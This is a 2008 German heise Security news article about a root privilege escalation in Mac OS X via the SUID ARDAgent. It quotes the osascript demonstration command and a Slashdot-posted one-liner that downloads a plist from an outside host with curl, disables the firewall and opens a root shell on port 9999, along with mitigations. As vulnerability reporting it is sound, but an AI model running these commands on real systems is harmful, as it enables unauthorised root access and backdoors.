heise online › News › 2008 › KW 25 › Root-Exploit für Mac OS X
20.06.2008 09:42
Root-Exploit für Mac OS X
Eine Schwachstelle in Mac OS X 10.4 und 10.5 erleichtert es potenziellen Angreifern, an Root-Rechte auf einem System zu gelangen. Ursache des Problems ist der ARDAgent, der als Teil des Remote-Managements das SUID-Bit gesetzt hat. Der ARDAgent (Apple Remote Desktop) ist in der Lage, AppleScripte mit Root-Rechten zu starten, die ihrerseits wieder Shell-Befehle enthalten können – und das Ganze ohne die Eingabe eines Passwortes.
Zur Demonstration des Problems genügt es, als Standardnutzer oder als Gast auf einem Rechner osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; in der Konsole einzugeben. Für einen erfolgreichen Angriff ist nicht zwingend der physische Zugriff auf ein System notwendig. Grundsätzlich funktioniert der Exploit auch aus der Ferne, etwa auf einem Server, auf dem ein Anwender ein eingeschränktes Konto mit SSH-Zugriff hat.
Auf Slashdot wurde dazu auch bereits ein Vorschlag gepostet, wie man das für eine Backdoor ausnutzen könnte. Die Zeile osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'. öffnete im Test von heise Security eine Root-Shell auf dem TCP-Port 9999.
Derweil gibt es schon mehrere Vorschläge, wie das Problem zu lösen sei. Der Exploit funktioniert nicht, wenn unter Mac OS X 10.5 "Systemeinstellungen/Sharing/" die Option "Entfernte Verwaltung" aktiviert ist – was standardmäßig nicht der Fall ist. Ähnliches soll gelten, wenn unter Mac OS X 10.4 der Apple Remote Desktop Client installiert und aktiviert ist. Darüber hinaus gibt es Vorschläge, den Apple Remote Desktop komplett zu entfernen, die Datei zu komprimieren oder beim ARDAgent das SUID-Bit zu löschen (chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent).
Siehe dazu auch:
- Mac OS X Root Escalation Through AppleScript, Thread auf Slashdot
- Apple Remote Desktop Vulnerability Allows Malicious Programs to Execute Code as Root, Bericht von Intego
(dab/c't)
Version zum Drucken | Per E-Mail versenden | Newsletter abonnieren
Kommentare lesen (409 Beiträge)
Themen-Forum Schwachstellen
English version: Root exploit for Mac OS X
heise Security
Programmieren von Exploits
Sieben Tutorials zeigen alles, was man wissen muss, um zuverlässige Exploits für Buffer Overflows in Software zu schreiben
mehr...
TLS-Renegotiation-Schwachstelle erklärt
Anhand einfacher Grafiken zeigt Thierry Zoller, wie sich die TLS-Renegotiation-Schwachstelle ausnutzen lässt.
mehr...
Security Operations von Innen
Im Security Operations Center (SOC) überwacht Symantec aus der Ferne die Netzwerke seiner Kunden auf Hackerangriffe und verdächtige Aktivitäten. Wir haben uns das SOC von innen angeschaut.
mehr...
Alerts
News
Sicherheitslücken in Add-ons gefährden Firefox-Anwender
ENISA-Studie hilft bei Risikoabschätzung für Cloud Computing
Fedora rudert bei den Installationsrechten zurück
PHP 5.3.1: Bug-Fixes und Sicherheitskorrekturen
Forderungen nach mehr Videoüberwachung für Sicherheit in Bus und Bahn
ONLINE MARKT
Werbung
Verbundene Unternehmen
Das eBook des Tages!